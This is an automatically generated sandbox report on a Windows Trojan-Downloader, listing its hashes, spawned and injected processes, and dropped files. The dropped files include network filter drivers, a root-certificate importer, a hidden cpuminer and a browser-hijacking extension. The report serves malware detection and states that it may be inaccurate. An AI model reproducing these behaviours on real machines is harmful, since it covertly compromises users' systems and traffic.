HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR, SearchProtectToolbar.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, VirTool
This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
Summary
MD5: a106c38e961227fe401fed3e357285bc
SHA1: 0f20114e27ce4a22b68bd6b326d6033183ccfa24
SHA256: 1c17b3de2308f87d3e9cbee15e9938a8d81377195f8f4fc6030b09e7a1352046
SSDeep: 1536:RQpQ5EP0ijnRTXJz54Gc9 BUM/wAcP0lscLD8F:RQIURTXJz54GW BUM/w9if6
Size: 71112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: g3CvT78vSMa0N0LPai7QvtmUwmghB
Created at: 2009-12-06 00:50:46
Analyzed on: Windows7Ada SP1 64-bit
Summary: Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
ProtectService.exe:3580
ProtectService.exe:3668
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884
ProtectWindowsManager.exe:3736
ProtectWindowsManager.exe:3316
import_root_cert.exe:3188
15094FED_stp.EXE:3668
cpuminer-x11opt-setup.exe:3752
DesProtetor.exe:536
wpm_v20.0.0.2227.exe:3268
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948
QQBrowser.exe:3824
QQBrowser.exe:3212
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816
powershell.exe:3772
powershell.exe:3656
powershell.exe:3376
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480
XTab_Setup2253.exe:1748
cmdshell.exe:3596
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400
amisid.exe:3516
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024
nfregdrv.exe:3588
nfregdrv.exe:3076
nfregdrv.exe:1648
nfregdrv.exe:3924
nfregdrv.exe:3192
HPNotify.exe:3640
CashReminder.exe:3984
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520
ActSys.exe:148
certutil.exe:3280
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268
amisetup2899__9664.exe:3368
GOSafer.exe:3264
WNet.exe:4016
310714_is.exe:948
The Trojan injects its code into the following process(es):
DesProtetor.exe:4032
%original file name%.exe:1512
CashReminder.exe:1108
ActSys.exe:3756
GOSafer.exe:3284
WNet.exe:3080
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
File activity
The process ProtectService.exe:3580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\XTab\msvcp110.dll (536 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (876 bytes)
The process ProtectService.exe:3668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\XTab\CmdShell.exe (32 bytes)
The process g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\mt-core[1].js (42633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\contabilizar[1].htm (162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\icone_cadeado[1].gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\verificar_ip[1].htm (105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[1] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\i[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\top-line[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\8Hk4o[1].htm (185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\SL2[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\carregando[1].gif (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\s9[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\warning[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310113f8[1].htm (1006 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\010914i[1].htm (308 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BD.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\MobiMidia_validation[1].js (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\150814c[1].htm (637 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\carregando3[1].gif (1 bytes)
The process ProtectWindowsManager.exe:3736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\up[1].htm (1 bytes)
C:\ProgramData\WindowsMangerProtect\update\conf (1 bytes)
The process import_root_cert.exe:3188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (90 bytes)
The process 15094FED_stp.EXE:3668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\DesProtetor\uninst.exe (1305 bytes)
%Program Files% (x86)\DesProtetor\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2A2C.tmp (74611 bytes)
%Program Files% (x86)\DesProtetor\ssleay32.dll (12088 bytes)
%Program Files% (x86)\DesProtetor\nfapi.dll (4992 bytes)
%Program Files% (x86)\DesProtetor\desprotetordrv.sys (1856 bytes)
C:\Windows\System32\drivers\desprotetordrv.sys (51 bytes)
%Program Files% (x86)\DesProtetor\libeay32.dll (35507 bytes)
%Program Files% (x86)\DesProtetor\DesProtetor.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\DesProtetor\ProtocolFilters.dll (9320 bytes)
The process cpuminer-x11opt-setup.exe:3752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\CPUFeatures.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\System.dll (23 bytes)
C:\Windows\System32\cpuminer-gw64.exe (41231 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll (12 bytes)
C:\Windows\System32\cpuminer-conf.json (420 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe (1279 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\UserInfo.dll (8 bytes)
The process DesProtetor.exe:536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\DesProtetor\ProtocolFilters.dll (249 bytes)
The process DesProtetor.exe:4032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[5].txt (111 bytes)
C:\Windows\Temp\P_RuleList.txt (111 bytes)
The process wpm_v20.0.0.2227.exe:3268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe (2444 bytes)
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\ActSys\asfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SelfDel.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Program Files% (x86)\ActSys\ssleay32.dll (12088 bytes)
%Program Files% (x86)\ActSys\remove_ActSys.exe (313 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\asfilterdrv.sys (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\nsExec.dll (14 bytes)
%Program Files% (x86)\ActSys\ProtocolFilters.dll (38495 bytes)
%Program Files% (x86)\ActSys\ActSys.exe (15990 bytes)
%Program Files% (x86)\ActSys\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SimpleSC.dll (1921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscF0B5.tmp (140252 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Program Files% (x86)\ActSys\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\NJaxIntermediate.cer (774 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss (4 bytes)
%Program Files% (x86)\ActSys\nfapi.dll (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\import_root_cert.exe (3406 bytes)
The process QQBrowser.exe:3824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe (286 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe (148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\479.db (288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe (114 bytes)
The process QQBrowser.exe:3212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\icon.png (628 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\index.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\aes.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\default_logo.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\newtab.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\misc.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\settings.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\google_trends.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\common.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en-US\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\js.js (660 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pl\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\simple.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\preferences.js (379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\scrollbar.bmp (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\addonmanager.js (531 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\googlelogo.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowserFrame.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\misc.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\stat.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\vi\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\tr\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\restoreprefs.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome.manifest (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\properties.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\ga.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (486 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\logo.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg.png (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\search.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\last_tab.js (4 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\style.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it\locale.properties (1 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe (14022 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\83B.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\Thumbs.db (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\speed_dial.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es-419\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\loading.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.xul (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\close.png (3 bytes)
%Program Files% (x86)\Mozilla Firefox\browser\searchplugins\istartsurf.xml (553 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\Thumbs.db (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\remoterequest.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\81A.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\fvd.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\WNet\ssfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SimpleSC.dll (1921 bytes)
C:\Windows\System32\drivers\ssfilterdrv.sys (51 bytes)
%Program Files% (x86)\WNet\uninst.exe (2792 bytes)
%Program Files% (x86)\WNet\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\WNet\ProtocolFilters.dll (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmEDE7.tmp (70570 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\WNet\ssleay32.dll (12088 bytes)
%Program Files% (x86)\WNet\WNet.exe (15606 bytes)
%Program Files% (x86)\WNet\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\System.dll (23 bytes)
%Program Files% (x86)\WNet\nfapi.dll (4992 bytes)
The process %original file name%.exe:1512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[2] (1 bytes)
